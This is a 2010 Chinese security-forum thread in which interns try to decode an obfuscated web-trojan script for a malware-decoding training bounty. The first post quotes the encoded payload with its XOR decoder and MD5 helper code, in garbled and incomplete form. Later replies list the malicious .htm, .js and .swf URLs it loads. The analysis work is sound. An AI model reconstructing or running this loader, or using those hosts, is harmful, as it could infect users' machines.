瑞星卡卡安全论坛

首页 » 综合娱乐区 » 活动专区 » 实习生专区 » 实习生交流区 » 此段网马如何解密??(来自网马解密悬赏四十五期)
暗夜的雪 - 2010-2-9 17:27:00
网马代码如下:
[quote]
<script>
strHTML="";
strHTML+="Z%15WE%5CDME%15AT_%1A%5C%07%1B%08%10%1B%0F%0BJ@%00%17%0FA%16%06%3F2%09";
strHTML+="%15%05F%5EE@%19%09%07%5DP%17YT%04%08@%29XGV6P%11%0C%16E@%06%3F28l%10UE";
strHTML+="%15W%04%16MF%0Co2E%00GB%02KCV%1C%13%5EE%08T%15%18sJG%07%1F%1C%1E%0E93%";
strHTML+="13%07A%17%0EK%13%5C%15R%1B%01%00%07U%03NM%05%1F%0E%5D%5C_A%0EL%06%1E%0";
strHTML+="E93%13%07A%17%00%18%0EAQ%0B%0D%5EI%1FG%16%16U%04%01%01%1DG%08WV%25%16%";
strHTML+="1E%0E93%12%0EZ%5B%07%10QOY%07%0D%5EE_Y_%10JT%18%19Z%19%05W%5D%1BBVG%14";
strHTML+="U%0DF%0E%17%00%16@%14W%11%17KXY%02%1BSI%0ABM%0A%1B%038l%02Q%5BP@%5CE%0";
strHTML+="4%08%3Ah%5E%5C%13%1D%0B%5E%09%0A%5EY%03%1B%5C_%1BP%03%5B%13%1EOFO%17TF";
strHTML+="K%04%1Fh%5E%3F%18%0EAY%0AC%12%11%5B%0D%13HE%05%0A%1F%7B%5DTY%03%05@pTF";
strHTML+="%5B%04%01V%1FK%03%3EkC%03%11%19%5EU%0F%13%5EE%08T%15%18s%5BA%0F%10QozV";
strHTML+="S%00%05G%1F@wd%22%04RMjAE%00R%07%16%0ET%07L%10%11%0EklQ%0A%5BQNE%27AE%";
strHTML+="03A%1BH%0Eoi%5C%1FG%10@%0BMW%18Y58%5D%1B%16%13G_%1D%06%10%5Ek9RLHF%12%";
strHTML+="5DJS%10%0A%3AoVM%15%13B%0A%10EQ%5B%02%09C%1E%0E93%03%09A%1F%0B%05%03Z%";
strHTML+="5C%5E%06%17%5DR%0BT%17%0D%5DXI%13%1BCS%09%14%1C%5D%08%04%02%0FZ%02%07Y";
strHTML+="R%18J%1C%19%17KHL%0AQ%09K%23G%03TGYA%03NQl%5Ci%10%5E%1BPV%16%5B%5BIPK%";
strHTML+="18DLJ%12Z%0D%01%09FLKFYA%13%15%09Rn%07dEM%14%10Y59%07Z%10KS%0C%07%5EY_";
strHTML+="TV%0A%08%13%19%11N%12%14MLZVSK%0B@s%03LR2Z%17%11ZTx%07Y%06%06%12%19%07";
strHTML+="c%01e%1C%5D%1B%14TT@Z%0DNV%1EBCN%1C8h_%16BT%17Z%13%11X%3Ch";
functionXOR(strV,strPass){
varintPassLength=strPass.length;
varre="";
for(vari=0;i<strV.length;i++){
re+=String.fromCharCode(strV.charCodeAt(i)^strPass.charCodeAt(i%intPassLength));
}
return(re);
}
varSTR=
{
hexcase:0,/*hexoutputformat.0-lowercase;1-uppercase*/
b64pad:"",/*base-64padcharacter."="forstrictRFCcompliance*/
chrsz:8,/*bitsperinputcharacter.8-ASCII;16-Unicode*/

b64_hmac_md5:
  function(key,data){returnbinl2b64(core_hmac_md5(key,data));},
 
b64_md5:
  function(s){returnbinl2b64(core_md5(str2binl(s),s.length*this.chrsz));},
 
binl2b64:
  function(binarray){
  vartab="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  varstr="";
  for(vari=0;i<binarray.length*4;i+=3)
  {
  vartriplet=(((binarray[i>>2]>>8*(i%4))&0xFF)<<16)
  |(((binarray[i+1>>2]>>8*((i+1)%4))&0xFF)<<8)
  |((binarray[i+2>>2]>>8*((i+2)%4))&0xFF);
  for(varj=0;j<4;j++)
  {
  if(i*8+j*6>binarray.length*32)str+=this.b64pad;
  elsestr+=tab.charAt((triplet>>6*(3-j))&0x3F);
  }
  }
  returnstr;
  },
 
binl2hex:
  function(binarray){
  varhex_tab=this.hexcase?"0123456789ABCDEF":"0123456789abcdef";
  varstr="";
  for(vari=0;i<binarray.length*4;i++)
  {
  str+=hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4))&0xF)+
  hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&0xF);
  }
  returnstr;
  },

binl2str:
  function(bin){
  varstr="";
  varmask=(1<<this.chrsz)-1;
  for(vari=0;i<bin.length*32;i+=this.chrsz)
  str+=String.fromCharCode((bin[i>>5]>>>(i%32))&mask);
  returnstr;
  },
 
bit_rol:
  function(num,cnt){return(num<<cnt)|(num>>>(32-cnt));},
 
core_hmac_md5:
  function(key,data){
  varbkey=str2binl(key);
  if(bkey.length>16)bkey=core_md5(bkey,key.length*this.chrsz);
 
  varipad=Array(16),opad=Array(16);
  for(vari=0;i<16;i++)
  {
  ipad=bkey^0x36363636;
  opad=bkey^0x5C5C5C5C;
  }
 
  varhash=core_md5(ipad.concat(str2binl(data)),512+data.length*this.chrsz);
  returncore_md5(opad.concat(hash),512+128);
  },
 
core_md5:
  function(x,len){
  /*appendpadding*/
  x[len>>5]|=0x80<<((len)%32);
  x[(((len+64)>>>9)<<4)+14]=len;
 
  vara=1732584193;
  varb=-271733879;
  varc=-1732584194;
  vard=271733878;
 
  for(vari=0;i<x.length;i+=16)
  {
  varolda=a;
  varoldb=b;
  varoldc=c;
  varoldd=d;
 
  a=this.md5_ff(a,b,c,d,x[i+0],7,-680876936);
  d=this.md5_ff(d,a,b,c,x[i+1],12,-389564586);
  c=this.md5_ff(c,d,a,b,x[i+2],17,606105819);
  b=this.md5_ff(b,c,d,a,x[i+3],22,-1044525330);
  a=this.md5_ff(a,b,c,d,x[i+4],7,-176418897);
  d=this.md5_ff(d,a,b,c,x[i+5],12,1200080426);
  c=this.md5_ff(c,d,a,b,x[i+6],17,-1473231341);
  b=this.md5_ff(b,c,d,a,x[i+7],22,-45705983);
  a=this.md5_ff(a,b,c,d,x[i+8],7,17
[\quote]
已经困扰我10天了~~~~  老师,高手们来看看呀~~~~

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 2.0.50727)
networkedition - 2010-2-9 17:32:00
用神器解密,直接运行脚本。
迷失の坏坏 - 2010-2-9 18:02:00
:kaka1: 老师一句话完事
暗夜的雪 - 2010-2-9 18:51:00

 附件: 您所在的用户组无法下载或查看附件
是这样么老师?里面没有eavl函数呀,提示无法运行,是不是需要把代码加工一下?
ty88 - 2010-2-9 23:08:00
http://bbs.ikaka.com/showtopic.aspx?topicid=8694694&page=2
19楼我说的很清楚了
DragonKid - 2010-2-9 23:31:00
老师,您说的也太简略了吧~~~
按照您的解释尝试了一下,与楼上是同样的结果
等待老师给出详细的解释
困惑中~~~:kaka8:
暗夜的雪 - 2010-2-10 1:35:00
1、在那一期的下载文件中没有document。write函数啊~~~~:kaka4:
2、怀疑是这段代码里有“终止符”导致一些工具获取不全代码。那么这个“终止符”又是什么呢?
3、直接用alert输出,完全没有对话框出现:kaka18: 真的是欲哭无泪了~~~~
4、难道这和浏览器版本有关系啊啊??

感谢大牛,在此膜拜~~~~~:kaka9:
Luke8 - 2010-2-10 1:53:00
怎么觉得很像有B64~~?是不是要先换B64,再提取地址呢?
networkedition - 2010-2-10 10:06:00
地址呢:kaka6: 还有你的代码全不全?
暗夜的雪 - 2010-2-10 11:19:00
]http://v.vv.wwvv.us/images/css/of.htm
不过好像已经失效了,也看出代码不全~如7楼~  谢谢老师回答~
networkedition - 2010-2-10 12:22:00
没有失效呀,里面不是有个document.write嘛。使用神器解密的时候需要删除script标签。



 附件: 您所在的用户组无法下载或查看附件
暗夜的雪 - 2010-2-10 13:57:00
Log is generated by FreShow.
[wide]http://v.vv.wwvv.us/images/css/of.htm
    [object]http://v.vv.wwvv.us/images/css/of.js
        [object]http://vvvv.wwvv.us/images/css/css.swf
老天啊  谢谢老师,用了各种工具  终于把这个顽固的马给弄出来了,为什么FreShow会获取代码不全呢??
ty88 - 2010-2-10 13:57:00
终止符的关系
辛达星郁 - 2010-2-10 14:13:00
终止符的关系 :kaka2:  啥叫终止符。
1
查看完整版本: 此段网马如何解密??(来自网马解密悬赏四十五期)
© 2000 - 2026 Rising Corp. Ltd.